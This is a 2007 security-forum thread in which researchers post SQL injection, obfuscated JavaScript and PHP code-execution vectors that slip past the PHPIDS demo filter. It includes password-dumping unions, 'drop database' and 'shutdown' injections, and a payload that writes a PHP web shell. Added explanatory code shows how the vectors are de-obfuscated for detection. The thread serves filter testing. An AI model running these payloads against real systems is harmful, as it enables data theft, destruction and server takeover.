Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 27, 2007 04:57PM

aa'LIKE'0 (php-ids)
aa'REGEXP/RLIKE BINARY 0#( (php-ids)
aa'SOUNDS LIKE+'1 (php-ids)
aa'or CURRENT_TIME!='0 (php-ids)
aa'or CURRENT_TIMESTAMP!='0 (php-ids)
aa'!=LOCALTIMESTAMP #( (php-ids)
aa'in (0)#( (php-ids)
aa'!=ascii(1)#( (php-ids)
... and other functions

(some may not be logical, but they all work - at least at my MySQL 4 DB)



Edited 5 time(s). Last edit at 09/27/2007 05:13PM by Reiners.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 28, 2007 06:25PM

successfully tested on MSSQL:
http://demo.php-ids.org/?test=1'%20union%20(select%20password%20from%20users)%20--%20-a
--> ?test=1' union (select password from users) -- -a
--> ?test=1' union (select'1','2',password from users) -- -a (for 3 columns)
--> ?test=1' union all (select'1',password from users) -- -a

--> ?test=' or SOUNDEX (1) != '0

http://demo.php-ids.org/?test=';if%201=1%20drop%20database%20test--%20-a
--> ?test=';if 1=1 drop database test-- -a
--> ?test=';if 1=1 drop table users-- -a
--> ?test=';if 1=1 shutdown-- -a
(combined with all possible operation and prefixes)

or
--> ?test='; while 1=1 shutdown-- -a
--> ?test='; begin shutdown end-- -a
(combined with other functions like create, drop and so on)

have a nice weekend,
Reiners



Edited 3 time(s). Last edit at 09/28/2007 08:13PM by Reiners.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 28, 2007 08:10PM

@Reiners: nice!

This one took some doing: [demo.php-ids.org]
?test='+COALESCE('admin') and 1 not between !1 div 0+' EDIT: <--- this returns an empty set.

Corrected: http://demo.php-ids.org/?test=%27%2bCOALESCE%28%27admin%27%29%20and%201%20not%20between%20%211%20div%201%2b%27
?test='+COALESCE('admin') and 1 not between !1 div 1+'

Auth Bypass for queries like
SELECT * FROM `users` WHERE username=''+COALESCE('admin') and 1 NOT BETWEEN !1 div 1+'' AND password='' LIMIT 1;

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 09/28/2007 10:19PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 28, 2007 08:44PM

Hi tx!
thanks ;) which DBMS are you using? couldn't run "coalesce('admin')" successfully on my MSSQL 2005, but I just installed it some hours ago and am still a bit confused about all the different possibilities and expressions compared to MySQL. There is a lot to discover I guess ... :)

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 28, 2007 09:18PM

@Reiners: MySQL 5.0.41. But it wouldn't run cause I made a typo, too eager to get home I guess :/

This is the correct vector
'+COALESCE('admin') and 1 not between !1 div 1+'
I'll edit my post, thx for noticing!

-tx @ lowtech-labs.org

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 28, 2007 10:47PM

I just thought of these variants on the way to the store (inspired by Reiners recent vectors): http://demo.php-ids.org/?test=%27%20COALESCE%28%27admin%27%29%20and%20@@version%20NOT%20BETWEEN%20%211%20div%201%20%27
?test='+COALESCE('admin') and @@version NOT BETWEEN !1 div 1+'
tons of options here:
?test='+COALESCE('admin') and @@version NOT BETWEEN !@@version div @@version+'
For fun:
?test='+COALESCE('admin') and 1 =+1 NOT BETWEEN !true div @@version+'

@Reiners: I just installed mssql :)
I have a feeling there is a lot of unexplored territory in Transact-SQL.

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/28/2007 10:49PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 29, 2007 11:16AM

Hi!

After a pretty long session of fixing and testing I think I got them all. Those were some hard nuts to crack this time... Some of them - especially the very short ones are detected with the concatenation rule - which I find ok since I would consider them to be used as very first probing. What do you think?

Greetings and nice weekend,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: September 29, 2007 12:38PM

Here's an arbitrary code execution one that works in firefox: http://demo.php-ids.org/?test=%24%61%3D%20%21%66%61%6C%73%65%3F%27%65%76%27%3A%31%0A%24%62%3D%20%21%66%61%6C%73%65%3F%20%27%61%6C%27%3A%31%0A%24%61%3D%20%21%66%61%6C%73%65%3F%24%61%2B%24%62%3A%31%0A%24%61%3D%20%21%66%61%6C%73%65%3F%30%5B%24%61%5D%3A%31%0A%24%62%3D%20%21%66%61%6C%73%65%3F%27%6C%6F%63%61%74%27%3A%31%0A%24%63%3D%20%21%66%61%6C%73%65%3F%27%69%6F%6E%2E%68%27%3A%31%0A%24%64%3D%20%21%66%61%6C%73%65%3F%27%61%73%68%27%3A%31%0A%24%62%3D%20%21%66%61%6C%73%65%3F%24%62%2B%24%63%2B%24%64%3A%31%0A%24%61%20%73%65%74%74%65%72%3D%24%61%2C%24%61%3D%24%61%3D%24%62#0=%7b%7d,alert%28%27thanks%20Gareth%20and%20Greg%27%29

This is a combined effort of Gareth and me, however inspiration for it came from this post from Greg: http://sla.ckers.org/forum/read.php?2,15812#msg-16293 .

Anyhow, here's the actual injection:

$a= !false?'ev':1
$b= !false? 'al':1
$a= !false?$a+$b:1
$a= !false?0[$a]:1
$b= !false?'locat':1
$c= !false?'ion.h':1
$d= !false?'ash':1
$b= !false?$b+$c+$d:1
$a setter=$a,$a=$a=$b

This one was too much work to not include a bit of an explanation... Working from the outside in. First eliminate the ternary operators which are a cool way Gareth found to concat strings together. Also, drop the $ from the variables which was needed to avoid a filter. This leaves something like:

a='eval';
a=0[a];
b='location.hash';
a setter=a;
a=a=b

The first two lines are just a way of setting a variable to the eval function. This has to be obfuscated because including the function eval directly triggers several filters.

The third line is the line of code that we need to eval. Note that .substr(1) is not needed because the hash sign can be interpreted as valid javascript if turned into a sharp variable. You just have to make the code after that hash be like: #0={};<<payload here>>

The final two lines use Greg's very cool trick to actually eval the location.hash without using any open or close parenthesis, which is necessary to avoid various filters (in particular, the new centrifuge one). Note that, as usual, we have to do the eval twice, the first time evaluates to the string in the hash, the second time executes the javascript in the hash where the true payload is contained. I find it amazing that a=a=b actually works.

So there ya go... arbitrary code execution. It's nice having a challenge like this to give us an excuse to dig into the gory innards of JavaScript. :)

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 29, 2007 01:04PM

@ thornmaker (and everyone involved): very nice!!

@.mario:
Nice fixes! but there are again a few tricks ;) However the rules detect all commonly used SQLi an attacker would try first I think.

some evasions with prefixes:
'=+' (php-ids)
-1'=-'+1 (php-ids)
aa' like+'0 (php-ids)
aa' REGEXP+'0 (php-ids)
aa' SOUNDS like+'1 (php-ids)
aa' or column=+!1 #1 (php-ids)

functions and statics can't be used anymore because the comment types get filtered. However you can combine functions with "and/or":
aa'in('aa') or-1!='0 (php-ids)
a'IS NOT NULL or+1=+'1 (php-ids)
aa'!=ascii(1) or-1=-'1 (php-ids)

But anyways, I think it's important to filter comment types and it does work very well atm (if it doesn't raise too many false positives ;)

as always I don't consider the next two to be dangerous, because an attacker needs to guess the column name first:
asd' or column= !1 and+1='1 (php-ids)
asd' or column&&'1 (php-ids)

Is there any wordlist you filter? because "aa'or LOCALTIME" gets detected, "aa'or LOCALTIM" not. But I can't see the word in the displayed rule. Same for the word "BINARY" for example. Could you post this wordlist please? (if it exists)



Edited 2 time(s). Last edit at 09/29/2007 01:16PM by Reiners.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: September 29, 2007 01:41PM

> So there ya go... arbitrary code execution. It's
> nice having a challenge like this to give us an
> excuse to dig into the gory innards of JavaScript.
> :)

Cool work man! Well done :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: September 30, 2007 04:02PM

I was bored on Sunday after footy, so I created 2 new vectors :-

Vector 1:-
$1 = /e1v1a1l/+''
$2 = []
$2 += $1[1]
$2 += $1[3]
$2 += $1[5]
$2 += $1[7]
$2 = $1[ $2 ]
$3 = /a1l1e1r1t1(1)1/+''
$4 = []
$4 += $3[1]
$4 += $3[3]
$4 += $3[5]
$4 += $3[7]
$4 += $3[9]
$4 += $3[11]
$4 += $3[12]
$4 += $3[13]
$2_ = $2
$4_ = $4
$2_ ( $4_ )

Vector 2:-
This next one is a beautiful one-liner, for which I've got to supply some
information on the quirks of JavaScript.

JavaScript allows you to call String functions on new strings like
''.StringFunction() as you probably know, but interestingly it also
allows calling functions without dots and as strings using []
brackets. So I used a regular expression with the .source property to
get the original string "replace", then I used a new regular expression
"/z/g" to replace the "z" from the string to create
"javascript:alert(1)". Finally, to create the replace I found a blank
string can be created using [], which completes the replace.

URL = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ] ](/z/g, [] )
: 0


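As an added illustration for this page (not Gareth's code, and not from the PHPIDS project), the primitives his two vectors rely on, run in a current engine with Node: a regex literal's `source` as an unquoted method name, `[]` coerced to the empty string, and fixed-offset character picking from a regex coerced to a string. It also shows where vector 1 stops in a modern engine: the `$2 = $1[ $2 ]` step relied on `Object.prototype.eval`, which the 2007 Firefox exposed on every object and which no longer exists, so the lookup now yields `undefined`. The function names are this example's own.

```javascript
// Added example: the primitives behind Gareth's two vectors, in a current engine.
// Function names are this example's own, not from the thread or from PHPIDS.

// A regex literal's source is a plain string, so /replace/['source'] names a
// method without quotes, and str[name](...) calls it without a dot.
function methodName(re) {
  return re['source'];
}

// Vector 2 minus the URL= sink. [] as the replacement coerces to '', so every
// 'z' is deleted and the result is the javascript: URL.
function vector2() {
  return !isNaN(1) ? 'javascriptz:zalertz(1)z'[/replace/['source']](/z/g, []) : 0;
}

// Vector 1's character picking: a regex coerced with +'' is just its source
// text with slashes, so fixed offsets spell a word the filter never sees.
// The accumulator starts as [] and becomes a string on the first +=.
function pick(re, offsets) {
  let out = [];
  for (const i of offsets) out += (re + '')[i];
  return out;
}

// The same []-as-empty-string trick reappears later in the thread as
// ['aler','t']['join']([]): join with '' as the separator.
function joinTrick() {
  return ['aler', 't']['join']([]);
}

// Where vector 1 stops today: in Firefox 2, "/e1v1a1l/"['eval'] resolved to
// Object.prototype.eval; a current engine has no such property, so typeof
// reports "undefined" and the final $2_ ( $4_ ) call would throw.
function legacyEvalLookup() {
  const s = /e1v1a1l/ + '';
  return typeof s[pick(/e1v1a1l/, [1, 3, 5, 7])];
}

console.log(vector2());                                              // javascript:alert(1)
console.log(pick(/a1l1e1r1t1(1)1/, [1, 3, 5, 7, 9, 11, 12, 13]));    // alert(1)
console.log(joinTrick(), legacyEvalLookup());                        // alert undefined
```

Run it with `node`. Vector 2 still produces `javascript:alert(1)` on any current engine, which is why a filter has to look past the quoting and dot-free call syntax; vector 1 needs the legacy `eval` property and is a Firefox-2-era vector only.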
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: September 30, 2007 08:16PM

@Reiners: I'm not an sql wiz, but you seem to be on quite a roll with all of these sql ones!

@gareth: nice, and creative!

@mario: this is a slight variant on the one posted yesterday: http://demo.php-ids.org/?test=%78%3D%21%5B%5D%3F%27%34%32%27%3A%30%0A%24%61%3D%20%21%78%3F%27%65%76%27%3A%30%0A%24%62%3D%20%21%78%3F%27%61%6C%27%3A%30%0A%24%61%3D%20%21%78%3F%24%61%2B%24%62%3A%30%0A%24%61%20%73%65%74%74%65%72%20%3D%20%21%78%3F%30%5B%24%61%5D%3A%30%0A%24%62%3D%20%21%78%3F%27%6C%6F%63%61%74%27%3A%30%0A%24%63%3D%20%21%78%3F%27%69%6F%6E%2E%68%27%3A%30%0A%24%64%3D%20%21%78%3F%27%61%73%68%27%3A%30%0A%24%62%3D%20%21%78%3F%24%62%2B%24%63%2B%24%64%3A%30%0A%24%6D%73%67%3D%20%21%78%3F%27%69%20%6C%6F%76%65%20%74%65%72%6E%61%72%79%20%6F%70%65%72%61%74%6F%72%73%27%3A%30%0A%24%61%3D%24%61%3D%24%62#%30%3D%7B%7D%3B%61%6C%65%72%74%28%24%6D%73%67%29

It looks like:
x=![]?'42':0
$a= !x?'ev':0
$b= !x?'al':0
$a= !x?$a+$b:0
$a setter= !x?0[$a]:0
$b= !x?'locat':0
$c= !x?'ion.h':0
$d= !x?'ash':0
$b= !x?$b+$c+$d:0
$a=$a=$b

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 01, 2007 02:48AM

@Reiners: Yep - before the string is matched by the rules a lot of things happen to it - check the converter class to see what exactly. Without the help on the converter class the rules would become really bloaty and many attacks couldn't be detected as such at all.

And yes - there's a big problem with comments - especially the # ones. So I think the comment rule won't be enhanced much more because it would generate tons of false alerts anyway. I will take care of the new SQL injections tomorrow - thanks again!

@thornmaker & Gareth: Awesome stuff as usual ;) Luckily the converter could take care of those concatenations pretty easily *fixed*

@All: We are thinking about building up a Wiki with extraordinary injections explained (JS, SQLI etc.)- we are discussing that issue in the group - what do you guys think?
http://groups.google.de/group/php-ids/browse_thread/thread/4e6d83e9ebd353c5

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 01, 2007 06:31AM

@.mario: I personally like the idea of the wiki to sum up the creative work coming up during the tests. especially the crazy JS ones ;)

new stuff for tomorrow:
--> ?test=1';declare @# int;shutdown;set @# = '1 (php-ids)
--> ?test=1';declare @@ int;shutdown;set @@ = '1 (php-ids)

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 01, 2007 03:00PM

I figure I've got to lay off the SQL for a bit, especially if we're gonna have a contest, so:

Remote code injection (php5): http://demo.php-ids.org/?test=%22%3B%20%24_a%3D%28%21%20%27a%27%29%20.%20%22php%22%3B%20%24_a.%3D%28%21%20%27a%27%29%20.%20%22info%22%3B%0A%24_a%281%29%3B%20%24b%3D%22
?test="; $_a=(! 'a') . "php"; $_a.=(! 'a') . "info";
$_a(1); $b="

EDIT: More dangerous variation: http://demo.php-ids.org/?test=%22%3B%0A%24_a%3D%28%21%20%27a%27%29%20.%20%22sys%22%3B%20%0A%20%20%24_a.%3D%28%21%20%27a%27%29%20.%20%22tem%22%3B%20%0A%24_b%3D%28%21%20%27a%27%29%20.%20%22bas%22%3B%20%0A%20%20%24_b.%3D%28%21%20%27a%27%29%20.%20%22e64%22%3B%20%0A%20%20%24_b.%3D%28%21%20%27a%27%29%20.%20%22_de%22%3B%20%0A%20%20%24_b.%3D%28%21%20%27a%27%29%20.%20%22cod%22%3B%20%0A%20%20%24_b.%3D%20%28%21%20%27a%27%29%20.%20%22e%22%3B%20%20%0A%24_c%3D%20%28%21%20%27a%27%29%20.%20%27a%27%3B%0A%24_d%3D%28%21%20%27a%27%20%29%20.%20%24_REQUEST%5B%20%24_c%20%5D%3B%20%0A%24_a%20%28%20%24_b%20%28%20%24_d%29%20%29%3B%20%0A//&a=ZWNobyBmb3JtYXQgYzpc
?test=";
$_a=(! 'a') . "sys"; 
  $_a.=(! 'a') . "tem"; 
$_b=(! 'a') . "bas"; 
  $_b.=(! 'a') . "e64"; 
  $_b.=(! 'a') . "_de"; 
  $_b.=(! 'a') . "cod"; 
  $_b.= (! 'a') . "e";  
$_c= (! 'a') . 'a';
$_d=(! 'a' ) . $_REQUEST[ $_c ]; 
$_a ( $_b ( $_d) ); 
//

Base 64 payload is not caught either http://demo.php-ids.org/?test=ZWNobyBmb3JtYXQgYzpc (not that I think it should be, 'echo format c:\' isn't really a threat, I just included this link to show that this vector would actually result in remote command execution without detection)


@.mario: I think the wiki is an excellent idea!

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 10/01/2007 04:30PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: October 01, 2007 05:48PM

good stuff tx!

Oh, and I like how you indented your code... much more readable that way :)

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 01, 2007 07:27PM

@.mario: Excellent and timely fixes, once again. :)
@thornmaker: thx!

Function call (phpinfo) can be bypassed as follows: http://demo.php-ids.org/?test=%22%3B%20define%28_a%2C%27phpinfo%27%29%3B%20if%20%20%281%29%20%24_a%3D_a%3B%20%24_a%281%29%3B//
?test="; define(_a,'phpinfo'); if  (1) $_a=_a; $_a(1);//

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 10/01/2007 07:49PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: October 01, 2007 08:48PM

another minor variation: http://demo.php-ids.org/?test=%24%61%3D%31%2E%3F%27%61%6C%27%3A%30%0A%24%61%3D%20%21%30%2E%3F%27%65%76%27%2B%24%61%3A%30%0A%24%61%20%73%65%74%74%65%72%3D%2F%78%2F%3F%30%5B%24%61%5D%3A%30%0A%24%62%3D%31%65%30%3F%27%61%73%68%27%3A%30%0A%24%62%3D%2E%31%65%31%3F%27%69%6F%6E%2E%68%27%2B%24%62%3A%30%0A%24%62%3D%31%2E%65%31%3F%27%6C%6F%63%61%74%27%2B%24%62%3A%30%0A%24%61%3D%24%61%3D%24%62#%30%3D%7B%7D%3B%61%6C%65%72%74%28%27%77%69%6B%69%20%77%69%6B%69%27%29

$a=1.?'al':0
$a= !0.?'ev'+$a:0
$a setter=/x/?0[$a]:0
$b=1e0?'ash':0
$b=.1e1?'ion.h'+$b:0
$b=1.e1?'locat'+$b:0
$a=$a=$b

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 01, 2007 09:38PM

Hi .mario!
Here are some more or less new filter evasions. I hope you still appreciate them and don't curse me for stressing you with work ;)

// some maths
aa'IS NOT NULL or+1^+'0
aa'IS NOT NULL or +1-1 xor'0
aa'IS NOT NULL or+2-1-1-1 !='0
aa'|1+1=(2)Or(1)='1
aa'|3!='4
aa'|ascii(1)+1!='1
aa'|LOCALTIME*0!='1

// spaces trick the filter
aa' = +'aa
aa' != ~'1
aa'SOUNDS like +'1
aa' or stringcolumn= +!1 #1
aa' or anycolumn ^ -'1
aa' or intcolumn && '1
aa'in('aa') or -1 != '0
aa'!=ascii(1) or -1 = -'1

// other
aa'like-'aa

greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: October 01, 2007 11:05PM

and another: http://demo.php-ids.org/?test=%24%61%3D%2F%69%2E%6C%6F%76%65%2E%63%68%61%6E%74%73%2F%0A%24%61%3D%31%2E%3F%27%27%2B%24%61%3A%30%0A%24%62%3D%24%61%5B%36%5D%0A%24%62%2B%3D%24%61%5B%35%5D%0A%24%62%2B%3D%24%61%5B%31%30%5D%0A%24%62%2B%3D%24%61%5B%33%5D%0A%24%62%20%73%65%74%74%65%72%3D%31%2E%3F%30%5B%24%62%5D%3A%30%0A%24%63%3D%24%61%5B%33%5D%0A%24%63%2B%3D%24%61%5B%34%5D%0A%24%63%2B%3D%24%61%5B%38%5D%0A%24%63%2B%3D%24%61%5B%31%30%5D%0A%24%63%2B%3D%24%61%5B%31%32%5D%0A%24%63%2B%3D%24%61%5B%31%5D%0A%24%63%2B%3D%24%61%5B%34%5D%0A%24%63%2B%3D%24%61%5B%31%31%5D%0A%24%63%2B%3D%24%61%5B%32%5D%0A%24%63%2B%3D%24%61%5B%39%5D%0A%24%63%2B%3D%24%61%5B%31%30%5D%0A%24%63%2B%3D%24%61%5B%31%33%5D%0A%24%63%2B%3D%24%61%5B%39%5D%0A%24%62%3D%24%62%3D%24%63#0=%7B%7D%3B%61%6C%65%72%74%28%27%6B%75%7A%61%3A%20%67%6F%20%73%74%75%64%79%27%29

[edit] i nearly forgot... here's the injection:

$a=/i.love.chants/
$a=1.?''+$a:0
$b=$a[6]
$b+=$a[5]
$b+=$a[10]
$b+=$a[3]
$b setter=1.?0[$b]:0
$c=$a[3]
$c+=$a[4]
$c+=$a[8]
$c+=$a[10]
$c+=$a[12]
$c+=$a[1]
$c+=$a[4]
$c+=$a[11]
$c+=$a[2]
$c+=$a[9]
$c+=$a[10]
$c+=$a[13]
$c+=$a[9]
$b=$b=$c



Edited 1 time(s). Last edit at 10/01/2007 11:48PM by thornmaker.

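The ternary, concatenation and character-picking tricks in thornmaker's vectors above, and in Gareth's vector 1, all keep `eval`, `alert` and `location.hash` out of the raw request so that a keyword rule never sees them; something has to fold the payload first, which is the job .mario attributes to the converter class. The following JavaScript is an added example written for this page, not PHPIDS code and not its converter: a deliberately small folding pass that takes two of the vectors posted above as input, resolves the string-building into the values the variables end up holding, and only then applies a keyword rule. It assumes one statement per line, string literals that contain no `+`, and treats a ternary whose else-branch is a bare number as a throwaway branch (the condition is never evaluated). The sample payloads are copied from the posts above; `fold`, `detect` and `RULE` are this example's own names.

```javascript
// Added example, not PHPIDS code: a small constant-folding pass for the
// ternary / concatenation / index obfuscation in the vectors above, and the
// keyword rule that only fires once the payload has been folded.
// Assumptions: one statement per line, string literals contain no '+', and a
// ternary whose else-branch is a bare number is a throwaway branch.

// `lhs = cond ? A : 0` -> `lhs = A`. The condition is never evaluated; the
// bare numeric else-branch is the tell.
function foldTernary(line) {
  return line.replace(/^(.*?=)\s*[^?=]+?\s*\?\s*(.+?)\s*:\s*\d+\s*$/, '$1 $2');
}

// Resolve every statement to the string value it produces.
function fold(payload) {
  const env = new Map();                                // variable -> folded value
  const values = [];                                    // one entry per statement
  const ident = (t) => t.replace(/\s+setter$/, '').trim();
  const term = (t) => {                                 // one operand of a + chain
    t = t.trim();
    let m;
    if ((m = t.match(/^'([^']*)'$/))) return m[1];    // string literal
    if (t === '[]') return '';                          // [] + 'x' === 'x'
    if (/^\/.+\/$/.test(t)) return t;                   // regex literal, coerced by +''
    if ((m = t.match(/^(.+?)\s*\[\s*(.+?)\s*\]$/))) {  // base[index]
      const base = term(m[1]), idx = term(m[2]);
      return /^\d+$/.test(idx) ? base.charAt(+idx) : `${base}[${idx}]`;
    }
    return env.get(t) ?? t;                             // identifier, or left as is
  };
  const expr = (e) => e.split('+').map(term).join('');

  for (const raw of payload.split('\n')) {
    const line = foldTernary(raw.trim());
    if (!line) continue;
    let m;
    if ((m = line.match(/^(.+?)\s*\+=\s*(.+)$/))) {    // x += expr
      const n = ident(m[1]);
      env.set(n, (env.get(n) ?? '') + expr(m[2]));
      values.push(env.get(n));
    } else if (line.includes('=')) {                    // a setter=a,a=a=expr: rightmost wins
      const parts = line.split('=');
      const v = expr(parts.pop());
      for (const lhs of parts) for (const n of lhs.split(',')) env.set(ident(n), v);
      values.push(v);
    } else {                                            // bare statement, e.g. a call
      values.push(line.replace(/\$?\w+/g, (t) => env.get(t) ?? t));
    }
  }
  return values;
}

// None of these words occur verbatim in the raw payloads below.
const RULE = /\beval\b|location\.hash|\balert\s*\(/;
function detect(payload) {
  return fold(payload).filter((v) => RULE.test(v));
}

// Sample inputs copied from the posts above: thornmaker's first ternary vector
// (without its #-fragment) and Gareth's vector 1.
const VECTOR_TERNARY = `$a= !false?'ev':1
$b= !false? 'al':1
$a= !false?$a+$b:1
$a= !false?0[$a]:1
$b= !false?'locat':1
$c= !false?'ion.h':1
$d= !false?'ash':1
$b= !false?$b+$c+$d:1
$a setter=$a,$a=$a=$b`;

const VECTOR_REGEX = `$1 = /e1v1a1l/+''
$2 = []
$2 += $1[1]
$2 += $1[3]
$2 += $1[5]
$2 += $1[7]
$2 = $1[ $2 ]
$3 = /a1l1e1r1t1(1)1/+''
$4 = []
$4 += $3[1]
$4 += $3[3]
$4 += $3[5]
$4 += $3[7]
$4 += $3[9]
$4 += $3[11]
$4 += $3[12]
$4 += $3[13]
$2_ = $2
$4_ = $4
$2_ ( $4_ )`;

for (const v of [VECTOR_TERNARY, VECTOR_REGEX]) {
  console.log('raw matches:', RULE.test(v), '| folded hits:', detect(v));
}
```

Run it with `node`. `RULE` never matches either raw payload; after folding, the ternary vector yields `eval`, `0[eval]` and `location.hash`, and Gareth's vector resolves its last line to `/e1v1a1l/[eval] ( alert(1) )`. The limits are the point: the pass understands exactly the idioms it was written for, so the next variant (a different always-true condition, a split inside a literal, a setter spelled another way) lands outside it, which is the cycle this thread is playing out between the vector authors and the converter.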
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 02, 2007 02:40AM

@tx: Nice PHP concat madness - damn I am relieved that PHP insists on a $ and \w+ for a variable label ;)

@Reiners: I will fix them ASAP! No curses - just a thx for helping increase the filter rules (I would have cursed if you had invented SQL *g*)

@thornmaker: Very cool! It took me some time to find out more on the setter part. Some info here: http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Guide:Working_with_Objects#Defining_Getters_and_Setters

> During development of JavaScript 1.5, there was a brief period in which expressions including getter = or setter = were used to define new getters or setters on existing objects. This syntax is highly deprecated now, will cause a warning in current JS 1.5 engines, and will become a syntax error in the future. It should be avoided.

@all: I will take care of building up the wiki tomorrow - I still haven't decided what software to use yet - so any input is still welcome.

Greetings,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: October 02, 2007 03:40AM

@Mario

It would be nice to be able to view failed attacks as well as successful ones. The failed attacks may provide inspiration for creating new ones. I've found loads of concat vectors which I could share, maybe we need some sort of forum or irc channel to discuss. We could always use the slackers one. I dunno what does everyone think?


Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 02, 2007 05:39AM

Would be a good idea to test all previous "fixed" exploits, since that is what most forgot, fixed one opened up another ^^ pentest strategy!~

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 02, 2007 06:44AM

@Ronald: I add any new exploit to the unit tests - so nothing will be lost. Also we have a tool to do regression tests with the xssDB data. And experience showed that if an exploit that was once fixed works again the guys from the group realize that faster than light ;)

@Gareth:
> It would be nice to be able to view failed attacks as well as successful ones.

You mean in the wiki?



Edited 2 time(s). Last edit at 10/02/2007 06:47AM by .mario.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: October 02, 2007 07:50AM

Maybe not the wiki but some sort of submission form, collecting all interesting vectors, you see some stuff isn't successful but nobody gets to see it even though it could be used in different ways. Ideally I would like a form to fill in with vector submissions that are successful or not and that information is viewable by everyone. I know you have the XSSDB but sharing specific information through the group would be useful.

Here's an example of an unsuccessful but cool vector:-
crypto [ [ 'aler' , 't' ] [ 'join' ] ( [] ) ] (1)

//Crypto is available in the window document on Firefox
//The object contains a reference to an alert function
//['aler','t'] creates an array and uses [] to perform the required array function
// [] joins the array to a string with nothing


Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 02, 2007 11:44AM

Hmmm - I think we can collect the unsuccessful vectors as well - as long as unsuccessful means that the vector gets detected by the PHPIDS. I think the main objective of the wiki should be to persist weird injections and uncover scripting techniques that are unknown to most developers/researchers.

Btw - I asked our admin to create a redirect to https://trac.php-ids.org/wiki/VectorWiki with vectors.php-ids.org - what do you think? (The wiki page itself is still very very basic - I will take care of that tomorrow)

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 02, 2007 01:23PM

Another remote command/code execution in php:
http://demo.php-ids.org/?test=%22%20%3B%20%20%0Adefine%20%28%20_a%20%2C%20%27ls%20-la%27%29%3B%0Aif%20%20%28%210%29%20%20%20%20%24_a%3D%22%22._a%3B%0Aif%20%28%210%29%20print%28%60%24_a%60%29%3B%0A//
?test=" ;  
define ( _a , 'ls -la');
if  (!0)    $_a=""._a;
if (!0) print(`$_a`);
//

With base64 payload [cHdk = base64_encode('pwd')]
http://demo.php-ids.org/?test=%22%20%3B%20%20define%20%28%20_c%20%2C%20%27cHdk%27%29%3B%0Aif%20%20%28%210%29%20%20%20%20%24_a%20%3D%20base64_decode%20%3B%0Aif%20%20%28%210%29%20%20%20%20%24_b%3D%22%22%20.%20%24_a%28_c%29%3B%0Aif%20%28%210%29%20print%28%60%24_b%60%29%3B//
?test=" ;  define ( _c , 'cHdk');
if  (!0)    $_a = base64_decode ;
if  (!0)    $_b="" . $_a(_c);
if  (!0) print(`$_b`);//

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 10/02/2007 03:51PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: October 02, 2007 03:35PM

.mario Wrote:
-------------------------------------------------------
> Hmmm - I think we can collect the unsuccessful
> vectors as well - as long as unsuccessful means
> that the vector gets detected by the PHPIDS.

Cool, I think that would be very useful, and can I also suggest that each entry has a payload point, for example instead of submitting alert(1) you would submit alert({payload}) etc. I know this is going beyond your original intention but I feel some of the stuff going on is priceless and should be collected and then incorporated into the XSSDB.

> Btw - I asked our admin to create a redirect to
> https://trac.php-ids.org/wiki/VectorWiki with
> vectors.php-ids.org - what do you think? (The wiki
> page itself is still very very basic - I will take
> care of that tomorrow)

Excellent I think that will be good for everyone to collaborate and produce documentation on these cool vectors.


Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 02, 2007 03:52PM

Variation, XOR'd payload :) http://demo.php-ids.org/?test=%22%3B%20%0Adefine%20%28%20_a%2C%20%220008avwga000934mm40re8n5n3aahgqvaga0a303%22%29%20%3B%0Aif%20%20%28%20%210%29%20%24c%20%3D%20USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC%20%5E%20_a%3B%0Aif%20%20%28%20%210%29%20system%28%24c%29%20%3B//
?test="; 
define ( _a, "0008avwga000934mm40re8n5n3aahgqvaga0a303") ;
if  ( !0) $c = USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC ^ _a;
if  ( !0) system($c) ;//

Payload is
echo "<? system($_GET["a"]); ?>" > t.php
